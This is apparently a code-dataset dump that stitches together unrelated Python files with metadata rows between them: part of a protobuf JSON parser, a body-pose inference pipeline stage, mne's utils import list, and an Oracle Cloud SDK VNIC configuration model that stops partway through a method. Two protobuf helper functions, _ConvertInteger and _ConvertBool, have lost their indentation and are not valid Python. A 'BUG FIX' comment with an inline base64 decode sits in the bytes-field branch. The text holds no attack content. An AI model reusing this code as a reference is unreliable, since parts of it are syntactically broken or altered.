                    field = message.Extensions._FindExtensionByName(identifier)
                    # pylint: enable=protected-access
                    if not field:
                        # Try looking for extension by the message type name, dropping the
                        # field name following the final . separator in full_name.
                        identifier = ".".join(identifier.split(".")[:-1])
                        # pylint: disable=protected-access
                        field = message.Extensions._FindExtensionByName(identifier)
                        # pylint: enable=protected-access
                if not field:
                    if self.ignore_unknown_fields:
                        continue
                    raise ParseError(
                        (
                            'Message type "{0}" has no field named "{1}".\n'
                            " Available Fields(except extensions): {2}"
                        ).format(
                            message_descriptor.full_name,
                            name,
                            [f.json_name for f in message_descriptor.fields],
                        )
                    )
                if name in names:
                    raise ParseError(
                        'Message type "{0}" should not have multiple '
                        '"{1}" fields.'.format(message.DESCRIPTOR.full_name, name)
                    )
                names.append(name)
                value = js[name]
                # Check no other oneof field is parsed.
                if field.containing_oneof is not None and value is not None:
                    oneof_name = field.containing_oneof.name
                    if oneof_name in names:
                        raise ParseError(
                            'Message type "{0}" should not have multiple '
                            '"{1}" oneof fields.'.format(
                                message.DESCRIPTOR.full_name, oneof_name
                            )
                        )
                    names.append(oneof_name)
                # JSON null clears the field, except for the two well-known
                # types where null is a legal value.
                if value is None:
                    if (
                        field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE
                        and field.message_type.full_name == "google.protobuf.Value"
                    ):
                        sub_message = getattr(message, field.name)
                        sub_message.null_value = 0
                    elif (
                        field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM
                        and field.enum_type.full_name == "google.protobuf.NullValue"
                    ):
                        setattr(message, field.name, 0)
                    else:
                        message.ClearField(field.name)
                    continue
                # Parse field value.
                if _IsMapEntry(field):
                    message.ClearField(field.name)
                    self._ConvertMapFieldValue(value, message, field)
                elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
                    message.ClearField(field.name)
                    if not isinstance(value, list):
                        raise ParseError(
                            "repeated field {0} must be in [] which is "
                            "{1}.".format(name, value)
                        )
                    if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
                        # Repeated message field.
                        for item in value:
                            sub_message = getattr(message, field.name).add()
                            # None is a null_value in Value.
                            if (
                                item is None
                                and sub_message.DESCRIPTOR.full_name
                                != "google.protobuf.Value"
                            ):
                                raise ParseError(
                                    "null is not allowed to be used as an element"
                                    " in a repeated field."
                                )
                            self.ConvertMessage(item, sub_message)
                    else:
                        # Repeated scalar field.
                        for item in value:
                            if item is None:
                                raise ParseError(
                                    "null is not allowed to be used as an element"
                                    " in a repeated field."
                                )
                            getattr(message, field.name).append(
                                _ConvertScalarFieldValue(item, field)
                            )
                elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
                    if field.is_extension:
                        sub_message = message.Extensions[field]
                    else:
                        sub_message = getattr(message, field.name)
                    sub_message.SetInParent()
                    self.ConvertMessage(value, sub_message)
                else:
                    if field.is_extension:
                        message.Extensions[field] = _ConvertScalarFieldValue(
                            value, field
                        )
                    else:
                        setattr(
                            message, field.name, _ConvertScalarFieldValue(value, field)
                        )
            # Re-wrap lower-level errors with the offending field name.
            except ParseError as e:
                if field and field.containing_oneof is None:
                    raise ParseError("Failed to parse {0} field: {1}.".format(name, e))
                else:
                    raise ParseError(str(e))
            except ValueError as e:
                raise ParseError("Failed to parse {0} field: {1}.".format(name, e))
            except TypeError as e:
                raise ParseError("Failed to parse {0} field: {1}.".format(name, e))
    def _ConvertAnyMessage(self, value, message):
        """Convert a JSON representation into Any message."""
        if isinstance(value, dict) and not value:
            return
        try:
            type_url = value["@type"]
        except KeyError:
            raise ParseError("@type is missing when parsing any message.")
        # Parse the payload into a message of the named type, then pack it.
        sub_message = _CreateMessageFromTypeUrl(type_url, self.descriptor_pool)
        message_descriptor = sub_message.DESCRIPTOR
        full_name = message_descriptor.full_name
        if _IsWrapperMessage(message_descriptor):
            self._ConvertWrapperMessage(value["value"], sub_message)
        elif full_name in _WKTJSONMETHODS:
            methodcaller(_WKTJSONMETHODS[full_name][1], value["value"], sub_message)(
                self
            )
        else:
            # Temporarily drop @type so it is not treated as a field name.
            del value["@type"]
            self._ConvertFieldValuePair(value, sub_message)
            value["@type"] = type_url
        # Sets Any message
        message.value = sub_message.SerializeToString()
        message.type_url = type_url
    def _ConvertGenericMessage(self, value, message):
        """Convert a JSON representation into message with FromJsonString."""
        # Duration, Timestamp, FieldMask have a FromJsonString method to do the
        # conversion. Users can also call the method directly.
        try:
            message.FromJsonString(value)
        except ValueError as e:
            raise ParseError(e)
    def _ConvertValueMessage(self, value, message):
        """Convert a JSON representation into Value message."""
        # Dispatch on the natural JSON type of the value.
        if isinstance(value, dict):
            self._ConvertStructMessage(value, message.struct_value)
        elif isinstance(value, list):
            self._ConvertListValueMessage(value, message.list_value)
        elif value is None:
            message.null_value = 0
        elif isinstance(value, bool):
            # bool must be tested before int: bool is a subclass of int.
            message.bool_value = value
        elif isinstance(value, str):
            message.string_value = value
        elif isinstance(value, _INT_OR_FLOAT):
            message.number_value = value
        else:
            raise ParseError(
                "Value {0} has unexpected type {1}.".format(value, type(value))
            )
    def _ConvertListValueMessage(self, value, message):
        """Convert a JSON representation into ListValue message."""
        if not isinstance(value, list):
            raise ParseError("ListValue must be in [] which is {0}.".format(value))
        message.ClearField("values")
        for item in value:
            self._ConvertValueMessage(item, message.values.add())
    def _ConvertStructMessage(self, value, message):
        """Convert a JSON representation into Struct message."""
        if not isinstance(value, dict):
            raise ParseError("Struct must be in a dict which is {0}.".format(value))
        # Clear will mark the struct as modified so it will be created even if
        # there are no values.
        message.Clear()
        for key in value:
            self._ConvertValueMessage(value[key], message.fields[key])
        return
    def _ConvertWrapperMessage(self, value, message):
        """Convert a JSON representation into Wrapper message."""
        # Wrapper messages carry exactly one field called 'value'.
        field = message.DESCRIPTOR.fields_by_name["value"]
        setattr(message, "value", _ConvertScalarFieldValue(value, field))
    def _ConvertMapFieldValue(self, value, message, field):
        """Convert map field value for a message map field.

        Args:
          value: A JSON object to convert the map field value.
          message: A protocol message to record the converted data.
          field: The descriptor of the map field to be converted.

        Raises:
          ParseError: In case of convert problems.
        """
        if not isinstance(value, dict):
            raise ParseError(
                "Map field {0} must be in a dict which is {1}.".format(
                    field.name, value
                )
            )
        key_field = field.message_type.fields_by_name["key"]
        value_field = field.message_type.fields_by_name["value"]
        for key in value:
            # Map keys arrive as JSON strings; require_str=True enforces that.
            key_value = _ConvertScalarFieldValue(key, key_field, True)
            if value_field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
                self.ConvertMessage(value[key], getattr(message, field.name)[key_value])
            else:
                getattr(message, field.name)[key_value] = _ConvertScalarFieldValue(
                    value[key], value_field
                )
def _ConvertScalarFieldValue(value, field, require_str=False):
    """Convert a single scalar field value.

    Args:
      value: A scalar value to convert the scalar field value.
      field: The descriptor of the field to convert.
      require_str: If True, the field value must be a str.

    Returns:
      The converted scalar field value

    Raises:
      ParseError: In case of convert problems.
    """
    if field.cpp_type in _INT_TYPES:
        return _ConvertInteger(value)
    elif field.cpp_type in _FLOAT_TYPES:
        return _ConvertFloat(value, field)
    elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL:
        return _ConvertBool(value, require_str)
    elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING:
        if field.type == descriptor.FieldDescriptor.TYPE_BYTES:
            # The proto3 JSON mapping carries bytes fields as base64 text.
            if isinstance(value, str):
                encoded = value.encode("utf-8")
            else:
                encoded = value
            # BUG FIX: this previously returned the undefined name
            # `padded_value` (a NameError) and never base64-decoded the
            # input.  Pad to a multiple of 4 and decode; the url-safe
            # decoder also accepts the standard '+'/'/' alphabet.
            import base64  # local import: the module header is outside this chunk

            padded_value = encoded + b"=" * (4 - len(encoded) % 4)
            return base64.urlsafe_b64decode(padded_value)
        else:
            # Checking for unpaired surrogates appears to be unreliable,
            # depending on the specific Python version, so we check manually.
            if _UNPAIRED_SURROGATE_PATTERN.search(value):
                raise ParseError("Unpaired surrogate")
            return value
    elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM:
        # Convert an enum value: try the symbolic name first, then fall back
        # to a numeric value.
        enum_value = field.enum_type.values_by_name.get(value, None)
        if enum_value is None:
            try:
                number = int(value)
                enum_value = field.enum_type.values_by_number.get(number, None)
            except ValueError:
                raise ParseError(
                    "Invalid enum value {0} for enum type {1}.".format(
                        value, field.enum_type.full_name
                    )
                )
            if enum_value is None:
                if field.file.syntax == "proto3":
                    # Proto3 accepts unknown enums.
                    return number
                raise ParseError(
                    "Invalid enum value {0} for enum type {1}.".format(
                        value, field.enum_type.full_name
                    )
                )
        return enum_value.number
def _ConvertInteger(value):
"""Convert an integer.
Args:
value: A scalar value to convert.
Returns:
The integer value.
Raises:
ParseError: If an integer couldn't be consumed.
"""
if isinstance(value, float) and not value.is_integer():
raise ParseError("Couldn't parse integer: {0}.".format(value))
if isinstance(value, str) and value.find(" ") != -1:
raise ParseError('Couldn\'t parse integer: "{0}".'.format(value))
if isinstance(value, bool):
raise ParseError(
"Bool value {0} is not acceptable for " "integer field.".format(value)
)
return int(value)
def _ConvertFloat(value, field):
    """Convert a JSON value into a float/double field value.

    Args:
      value: A scalar value (number or string) to convert.
      field: The descriptor of the floating-point field being set.

    Returns:
      The parsed float.

    Raises:
      ParseError: If the value is an unquoted NaN/Infinity, overflows a
        32-bit float field, or cannot be parsed at all.
    """
    if isinstance(value, float):
        # Bare (unquoted) JSON numbers may not encode NaN or +/-Infinity;
        # the error messages point users at the quoted spellings instead.
        if math.isnan(value):
            raise ParseError('Couldn\'t parse NaN, use quoted "NaN" instead.')
        if math.isinf(value):
            if value > 0:
                raise ParseError(
                    "Couldn't parse Infinity or value too large, "
                    'use quoted "Infinity" instead.'
                )
            else:
                raise ParseError(
                    "Couldn't parse -Infinity or value too small, "
                    'use quoted "-Infinity" instead.'
                )
        # Range-check only 32-bit float fields; doubles fall through.
        if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_FLOAT:
            # pylint: disable=protected-access
            if value > type_checkers._FLOAT_MAX:
                raise ParseError("Float value too large")
            # pylint: disable=protected-access
            if value < type_checkers._FLOAT_MIN:
                raise ParseError("Float value too small")
    # float("nan") would parse successfully, so reject the lowercase
    # spelling explicitly before attempting the conversion below.
    if value == "nan":
        raise ParseError('Couldn\'t parse float "nan", use "NaN" instead.')
    try:
        # Assume Python compatible syntax.
        return float(value)
    except ValueError:
        # Check alternative spellings (module-level sentinel strings).
        if value == _NEG_INFINITY:
            return float("-inf")
        elif value == _INFINITY:
            return float("inf")
        elif value == _NAN:
            return float("nan")
        else:
            raise ParseError("Couldn't parse float: {0}.".format(value))
def _ConvertBool(value, require_str):
"""Convert a boolean value.
Args:
value: A scalar value to convert.
require_str: If True, value must be a str.
Returns:
The bool parsed.
Raises:
ParseError: If a boolean value couldn't be consumed.
"""
if require_str:
if value == "true":
return True
elif value == "false":
return False
else:
raise ParseError('Expected "true" or "false", not {0}.'.format(value))
if not isinstance(value, bool):
raise ParseError("Expected true or false without quotes.")
return value
# Dispatch table for well-known types: maps a message's full name to the
# pair [printer method name, parser method name].  The parser names match
# the _Convert* methods defined above; the printer methods presumably live
# on the serializer class elsewhere in this module — keep these strings in
# sync with the actual method definitions.
_WKTJSONMETHODS = {
    "google.protobuf.Any": ["_AnyMessageToJsonObject", "_ConvertAnyMessage"],
    "google.protobuf.Duration": [
        "_GenericMessageToJsonObject",
        "_ConvertGenericMessage",
    ],
    "google.protobuf.FieldMask": [
        "_GenericMessageToJsonObject",
        "_ConvertGenericMessage",
    ],
    "google.protobuf.ListValue": [
        "_ListValueMessageToJsonObject",
        "_ConvertListValueMessage",
    ],
    "google.protobuf.Struct": ["_StructMessageToJsonObject", "_ConvertStructMessage"],
    "google.protobuf.Timestamp": [
        "_GenericMessageToJsonObject",
        "_ConvertGenericMessage",
    ],
    "google.protobuf.Value": ["_ValueMessageToJsonObject", "_ConvertValueMessage"],
}
| 39.897186 | 90 | 0.600136 |
ace746486874813f51d5505e1799511ea2783177 | 2,127 | py | Python | src/blocks/body_pose.py | wangxihao/rgbd-kinect-pose | 03180723c99759ba2500bcd42b5fe7a1d26eb507 | [
"MIT"
] | 1 | 2022-02-07T06:12:26.000Z | 2022-02-07T06:12:26.000Z | src/blocks/body_pose.py | wangxihao/rgbd-kinect-pose | 03180723c99759ba2500bcd42b5fe7a1d26eb507 | [
"MIT"
] | null | null | null | src/blocks/body_pose.py | wangxihao/rgbd-kinect-pose | 03180723c99759ba2500bcd42b5fe7a1d26eb507 | [
"MIT"
] | null | null | null | import os.path as osp
import numpy as np
import time
import torch
from multiprocessing_pipeline import Assembler, Processor, Dissembler
from multiprocessing_pipeline import QueueMsg, QueueData, MetaMsg
from body_pose.inferer import Inferer
class BodyPose(Processor):
    """Pipeline stage that runs body-pose inference on Kinect joint data.

    The heavyweight ``Inferer`` is built lazily on the first processed value
    so that model loading happens inside the worker, not at construction.
    """

    def __init__(
        self,
        name, msg_queue, input_queue, output_queue, assembler_input_queue,
        data_dirpath, processor_config, pykinect_data_dp,
        **kwargs
    ):
        super().__init__(
            name, msg_queue, input_queue, output_queue,
            assembler_input_queue, **kwargs
        )
        self.data_dirpath = data_dirpath
        self.processor_config = processor_config
        self.pykinect_data_dp = pykinect_data_dp
        # Runtime options pulled from the processor configuration.
        self.log_level = processor_config.get('log_level', 2)
        self.device = torch.device(processor_config['device'])
        self.gender = processor_config['gender']
        # Per-person shape coefficients (presumably SMPL betas — 'betas.npy').
        shape_fp = osp.join(
            data_dirpath, processor_config['person_shape_path'], 'betas.npy'
        )
        self.beta = np.load(shape_fp)
        self.model_dp = osp.join(data_dirpath, processor_config['model_path'])
        # Created lazily in process_value.
        self.inferer = None
        self.index = -1
        self.output_count = 0

    def process_value(self, x):
        """Run inference for one frame dict and return the enriched result."""
        self.index += 1
        if self.inferer is None:
            # First value: construct the inference engine in-process.
            self.inferer = Inferer(
                model_dp=self.model_dp,
                checkpoint=self.processor_config['checkpoint'],
                device=self.device,
                beta=self.beta,
                gender=self.gender,
                pykinect_data_dp=self.pykinect_data_dp
            )
        result = self.inferer.inf(x['body_pose'], x['body_conf'])
        # Propagate frame metadata alongside the inference output.
        result['time'] = x['time']
        result['is_close_hands'] = x['is_close_hands']
        if self.output_count == 0 and self.log_level >= 1:
            print(f'{self.subblock_name} working')
        self.output_count += 1
        return result

    def destructor(self):
        """No resources to release."""
        pass
| 31.279412 | 109 | 0.623883 |
ace7465479e36bd2ecb576b4fea039099be69059 | 3,980 | py | Python | mne/utils/__init__.py | Gaoqunxia/mne-python | 71a854d8eafe21676e545d8286b51422f34b26c3 | [
"BSD-3-Clause"
] | 1 | 2019-12-11T05:07:08.000Z | 2019-12-11T05:07:08.000Z | mne/utils/__init__.py | Gaoqunxia/mne-python | 71a854d8eafe21676e545d8286b51422f34b26c3 | [
"BSD-3-Clause"
] | null | null | null | mne/utils/__init__.py | Gaoqunxia/mne-python | 71a854d8eafe21676e545d8286b51422f34b26c3 | [
"BSD-3-Clause"
] | null | null | null | # # # WARNING # # #
# This list must also be updated in doc/_templates/autosummary/class.rst if it
# is changed here!
_doc_special_members = ('__contains__', '__getitem__', '__iter__', '__len__',
'__add__', '__sub__', '__mul__', '__div__',
'__neg__', '__hash__')
from ._bunch import Bunch, BunchConst, BunchConstNamed
from .check import (check_fname, check_version, check_random_state,
_check_fname, _check_subject, _check_pandas_installed,
_check_pandas_index_arguments, _check_mayavi_version,
_check_event_id, _check_ch_locs, _check_compensation_grade,
_check_if_nan, _is_numeric, _ensure_int, _check_preload,
_validate_type, _check_info_inv, _check_pylsl_installed,
_check_channels_spatial_filter, _check_one_ch_type,
_check_rank, _check_option, _check_depth, _check_combine,
_check_path_like, _check_src_normal, _check_stc_units,
_check_pyqt5_version)
from .config import (set_config, get_config, get_config_path, set_cache_dir,
set_memmap_min_size, get_subjects_dir, _get_stim_channel,
sys_info, _get_extra_data_path, _get_root_dir,
_get_call_line, _get_numpy_libs)
from .docs import (copy_function_doc_to_method_doc, copy_doc, linkcode_resolve,
open_docs, deprecated, fill_doc, copy_base_doc_to_subclass_doc)
from .fetching import _fetch_file, _url_to_local_path
from ._logging import (verbose, logger, set_log_level, set_log_file,
use_log_level, catch_logging, warn, filter_out_warnings,
ETSContext, wrapped_stdout)
from .misc import (run_subprocess, _pl, _clean_names, pformat, _file_like,
_explain_exception, _get_argvalues, sizeof_fmt,
running_subprocess, _DefaultEventParser)
from .progressbar import ProgressBar
from ._testing import (run_tests_if_main, run_command_if_main,
requires_sklearn,
requires_version, requires_nibabel, requires_mayavi,
requires_good_network, requires_mne, requires_pandas,
requires_h5py, traits_test, requires_pysurfer,
ArgvSetter, SilenceStdout, has_freesurfer, has_mne_c,
_TempDir, has_nibabel, _import_mlab, buggy_mkl_svd,
requires_numpydoc, requires_tvtk, requires_freesurfer,
requires_nitime, requires_dipy,
requires_neuromag2ft, requires_pylsl, assert_object_equal,
assert_and_remove_boundary_annot, _raw_annot,
assert_dig_allclose, assert_meg_snr, assert_snr,
assert_stcs_equal, modified_env)
from .numerics import (hashfunc, _compute_row_norms,
_reg_pinv, random_permutation, _reject_data_segments,
compute_corr, _get_inst_data, array_split_idx,
sum_squared, split_list, _gen_events, create_slices,
_time_mask, _freq_mask, grand_average, object_diff,
object_hash, object_size, _apply_scaling_cov,
_undo_scaling_cov, _apply_scaling_array,
_undo_scaling_array, _scaled_array, _replace_md5, _PCA,
_mask_to_onsets_offsets, _array_equal_nan,
_julian_to_cal, _cal_to_julian, _dt_to_julian,
_julian_to_dt, _dt_to_stamp, _stamp_to_dt,
_check_dt)
from .mixin import (SizeMixin, GetEpochsMixin, _prepare_read_metadata,
_prepare_write_metadata, _FakeNoPandas, ShiftTimeMixin)
from .linalg import (_svd_lwork, _repeated_svd,
dgesdd, dgemm, zgemm, dgemv, ddot, LinAlgError, eigh)
| 64.193548 | 82 | 0.644975 |
ace74708c33f5fcf59a399de865372d78ee63e13 | 14,682 | py | Python | src/oci/core/models/instance_configuration_create_vnic_details.py | LaudateCorpus1/oci-python-sdk | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/core/models/instance_configuration_create_vnic_details.py | LaudateCorpus1/oci-python-sdk | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/core/models/instance_configuration_create_vnic_details.py | LaudateCorpus1/oci-python-sdk | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
# Generated-style OCI SDK model: one backing field + getter/setter property
# per API attribute, with swagger_types/attribute_map driving (de)serialization.
@init_model_state_from_kwargs
class InstanceConfigurationCreateVnicDetails(object):
    """
    Contains the properties of the VNIC for an instance configuration. See :class:`CreateVnicDetails`
    and `Instance Configurations`__ for more information.
    __ https://docs.cloud.oracle.com/iaas/Content/Compute/Concepts/instancemanagement.htm#config
    """
    def __init__(self, **kwargs):
        """
        Initializes a new InstanceConfigurationCreateVnicDetails object with values from keyword arguments.
        The following keyword arguments are supported (corresponding to the getters/setters of this class):
        :param assign_public_ip:
            The value to assign to the assign_public_ip property of this InstanceConfigurationCreateVnicDetails.
        :type assign_public_ip: bool
        :param assign_private_dns_record:
            The value to assign to the assign_private_dns_record property of this InstanceConfigurationCreateVnicDetails.
        :type assign_private_dns_record: bool
        :param defined_tags:
            The value to assign to the defined_tags property of this InstanceConfigurationCreateVnicDetails.
        :type defined_tags: dict(str, dict(str, object))
        :param display_name:
            The value to assign to the display_name property of this InstanceConfigurationCreateVnicDetails.
        :type display_name: str
        :param freeform_tags:
            The value to assign to the freeform_tags property of this InstanceConfigurationCreateVnicDetails.
        :type freeform_tags: dict(str, str)
        :param hostname_label:
            The value to assign to the hostname_label property of this InstanceConfigurationCreateVnicDetails.
        :type hostname_label: str
        :param nsg_ids:
            The value to assign to the nsg_ids property of this InstanceConfigurationCreateVnicDetails.
        :type nsg_ids: list[str]
        :param private_ip:
            The value to assign to the private_ip property of this InstanceConfigurationCreateVnicDetails.
        :type private_ip: str
        :param skip_source_dest_check:
            The value to assign to the skip_source_dest_check property of this InstanceConfigurationCreateVnicDetails.
        :type skip_source_dest_check: bool
        :param subnet_id:
            The value to assign to the subnet_id property of this InstanceConfigurationCreateVnicDetails.
        :type subnet_id: str
        """
        # Attribute name -> Swagger type string (presumably consumed by the
        # SDK's generic (de)serialization helpers — defined outside this file).
        self.swagger_types = {
            'assign_public_ip': 'bool',
            'assign_private_dns_record': 'bool',
            'defined_tags': 'dict(str, dict(str, object))',
            'display_name': 'str',
            'freeform_tags': 'dict(str, str)',
            'hostname_label': 'str',
            'nsg_ids': 'list[str]',
            'private_ip': 'str',
            'skip_source_dest_check': 'bool',
            'subnet_id': 'str'
        }
        # Python attribute name -> camelCase JSON key used on the wire.
        self.attribute_map = {
            'assign_public_ip': 'assignPublicIp',
            'assign_private_dns_record': 'assignPrivateDnsRecord',
            'defined_tags': 'definedTags',
            'display_name': 'displayName',
            'freeform_tags': 'freeformTags',
            'hostname_label': 'hostnameLabel',
            'nsg_ids': 'nsgIds',
            'private_ip': 'privateIp',
            'skip_source_dest_check': 'skipSourceDestCheck',
            'subnet_id': 'subnetId'
        }
        # Backing fields for the properties defined below.
        self._assign_public_ip = None
        self._assign_private_dns_record = None
        self._defined_tags = None
        self._display_name = None
        self._freeform_tags = None
        self._hostname_label = None
        self._nsg_ids = None
        self._private_ip = None
        self._skip_source_dest_check = None
        self._subnet_id = None
    # --- Property accessors: one getter/setter pair per model attribute ---
    @property
    def assign_public_ip(self):
        """
        Gets the assign_public_ip of this InstanceConfigurationCreateVnicDetails.
        Whether the VNIC should be assigned a public IP address. See the `assignPublicIp` attribute of :class:`CreateVnicDetails`
        for more information.
        :return: The assign_public_ip of this InstanceConfigurationCreateVnicDetails.
        :rtype: bool
        """
        return self._assign_public_ip
    @assign_public_ip.setter
    def assign_public_ip(self, assign_public_ip):
        """
        Sets the assign_public_ip of this InstanceConfigurationCreateVnicDetails.
        Whether the VNIC should be assigned a public IP address. See the `assignPublicIp` attribute of :class:`CreateVnicDetails`
        for more information.
        :param assign_public_ip: The assign_public_ip of this InstanceConfigurationCreateVnicDetails.
        :type: bool
        """
        self._assign_public_ip = assign_public_ip
    @property
    def assign_private_dns_record(self):
        """
        Gets the assign_private_dns_record of this InstanceConfigurationCreateVnicDetails.
        Whether the VNIC should be assigned a private DNS record. See the `assignPrivateDnsRecord` attribute of :class:`CreateVnicDetails`
        for more information.
        :return: The assign_private_dns_record of this InstanceConfigurationCreateVnicDetails.
        :rtype: bool
        """
        return self._assign_private_dns_record
    @assign_private_dns_record.setter
    def assign_private_dns_record(self, assign_private_dns_record):
        """
        Sets the assign_private_dns_record of this InstanceConfigurationCreateVnicDetails.
        Whether the VNIC should be assigned a private DNS record. See the `assignPrivateDnsRecord` attribute of :class:`CreateVnicDetails`
        for more information.
        :param assign_private_dns_record: The assign_private_dns_record of this InstanceConfigurationCreateVnicDetails.
        :type: bool
        """
        self._assign_private_dns_record = assign_private_dns_record
    @property
    def defined_tags(self):
        """
        Gets the defined_tags of this InstanceConfigurationCreateVnicDetails.
        Defined tags for this resource. Each key is predefined and scoped to a
        namespace. For more information, see `Resource Tags`__.
        Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
        :return: The defined_tags of this InstanceConfigurationCreateVnicDetails.
        :rtype: dict(str, dict(str, object))
        """
        return self._defined_tags
    @defined_tags.setter
    def defined_tags(self, defined_tags):
        """
        Sets the defined_tags of this InstanceConfigurationCreateVnicDetails.
        Defined tags for this resource. Each key is predefined and scoped to a
        namespace. For more information, see `Resource Tags`__.
        Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
        :param defined_tags: The defined_tags of this InstanceConfigurationCreateVnicDetails.
        :type: dict(str, dict(str, object))
        """
        self._defined_tags = defined_tags
    @property
    def display_name(self):
        """
        Gets the display_name of this InstanceConfigurationCreateVnicDetails.
        A user-friendly name. Does not have to be unique, and it's changeable.
        Avoid entering confidential information.
        :return: The display_name of this InstanceConfigurationCreateVnicDetails.
        :rtype: str
        """
        return self._display_name
    @display_name.setter
    def display_name(self, display_name):
        """
        Sets the display_name of this InstanceConfigurationCreateVnicDetails.
        A user-friendly name. Does not have to be unique, and it's changeable.
        Avoid entering confidential information.
        :param display_name: The display_name of this InstanceConfigurationCreateVnicDetails.
        :type: str
        """
        self._display_name = display_name
    @property
    def freeform_tags(self):
        """
        Gets the freeform_tags of this InstanceConfigurationCreateVnicDetails.
        Free-form tags for this resource. Each tag is a simple key-value pair with no
        predefined name, type, or namespace. For more information, see `Resource Tags`__.
        Example: `{\"Department\": \"Finance\"}`
        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
        :return: The freeform_tags of this InstanceConfigurationCreateVnicDetails.
        :rtype: dict(str, str)
        """
        return self._freeform_tags
    @freeform_tags.setter
    def freeform_tags(self, freeform_tags):
        """
        Sets the freeform_tags of this InstanceConfigurationCreateVnicDetails.
        Free-form tags for this resource. Each tag is a simple key-value pair with no
        predefined name, type, or namespace. For more information, see `Resource Tags`__.
        Example: `{\"Department\": \"Finance\"}`
        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
        :param freeform_tags: The freeform_tags of this InstanceConfigurationCreateVnicDetails.
        :type: dict(str, str)
        """
        self._freeform_tags = freeform_tags
    @property
    def hostname_label(self):
        """
        Gets the hostname_label of this InstanceConfigurationCreateVnicDetails.
        The hostname for the VNIC's primary private IP.
        See the `hostnameLabel` attribute of :class:`CreateVnicDetails` for more information.
        :return: The hostname_label of this InstanceConfigurationCreateVnicDetails.
        :rtype: str
        """
        return self._hostname_label
    @hostname_label.setter
    def hostname_label(self, hostname_label):
        """
        Sets the hostname_label of this InstanceConfigurationCreateVnicDetails.
        The hostname for the VNIC's primary private IP.
        See the `hostnameLabel` attribute of :class:`CreateVnicDetails` for more information.
        :param hostname_label: The hostname_label of this InstanceConfigurationCreateVnicDetails.
        :type: str
        """
        self._hostname_label = hostname_label
    @property
    def nsg_ids(self):
        """
        Gets the nsg_ids of this InstanceConfigurationCreateVnicDetails.
        A list of the OCIDs of the network security groups (NSGs) to add the VNIC to. For more
        information about NSGs, see
        :class:`NetworkSecurityGroup`.
        :return: The nsg_ids of this InstanceConfigurationCreateVnicDetails.
        :rtype: list[str]
        """
        return self._nsg_ids
    @nsg_ids.setter
    def nsg_ids(self, nsg_ids):
        """
        Sets the nsg_ids of this InstanceConfigurationCreateVnicDetails.
        A list of the OCIDs of the network security groups (NSGs) to add the VNIC to. For more
        information about NSGs, see
        :class:`NetworkSecurityGroup`.
        :param nsg_ids: The nsg_ids of this InstanceConfigurationCreateVnicDetails.
        :type: list[str]
        """
        self._nsg_ids = nsg_ids
    @property
    def private_ip(self):
        """
        Gets the private_ip of this InstanceConfigurationCreateVnicDetails.
        A private IP address of your choice to assign to the VNIC.
        See the `privateIp` attribute of :class:`CreateVnicDetails` for more information.
        :return: The private_ip of this InstanceConfigurationCreateVnicDetails.
        :rtype: str
        """
        return self._private_ip
    @private_ip.setter
    def private_ip(self, private_ip):
        """
        Sets the private_ip of this InstanceConfigurationCreateVnicDetails.
        A private IP address of your choice to assign to the VNIC.
        See the `privateIp` attribute of :class:`CreateVnicDetails` for more information.
        :param private_ip: The private_ip of this InstanceConfigurationCreateVnicDetails.
        :type: str
        """
        self._private_ip = private_ip
    @property
    def skip_source_dest_check(self):
        """
        Gets the skip_source_dest_check of this InstanceConfigurationCreateVnicDetails.
        Whether the source/destination check is disabled on the VNIC.
        See the `skipSourceDestCheck` attribute of :class:`CreateVnicDetails` for more information.
        :return: The skip_source_dest_check of this InstanceConfigurationCreateVnicDetails.
        :rtype: bool
        """
        return self._skip_source_dest_check
    @skip_source_dest_check.setter
    def skip_source_dest_check(self, skip_source_dest_check):
        """
        Sets the skip_source_dest_check of this InstanceConfigurationCreateVnicDetails.
        Whether the source/destination check is disabled on the VNIC.
        See the `skipSourceDestCheck` attribute of :class:`CreateVnicDetails` for more information.
        :param skip_source_dest_check: The skip_source_dest_check of this InstanceConfigurationCreateVnicDetails.
        :type: bool
        """
        self._skip_source_dest_check = skip_source_dest_check
    @property
    def subnet_id(self):
        """
        Gets the subnet_id of this InstanceConfigurationCreateVnicDetails.
        The OCID of the subnet to create the VNIC in.
        See the `subnetId` attribute of :class:`CreateVnicDetails` for more information.
        :return: The subnet_id of this InstanceConfigurationCreateVnicDetails.
        :rtype: str
        """
        return self._subnet_id
    @subnet_id.setter
    def subnet_id(self, subnet_id):
        """
        Sets the subnet_id of this InstanceConfigurationCreateVnicDetails.
        The OCID of the subnet to create the VNIC in.
        See the `subnetId` attribute of :class:`CreateVnicDetails` for more information.
        :param subnet_id: The subnet_id of this InstanceConfigurationCreateVnicDetails.
        :type: str
        """
        self._subnet_id = subnet_id
    def __repr__(self):
        # Readable dump of all attributes via the SDK helper.
        return formatted_flat_dict(self)
    def __eq__(self, other):
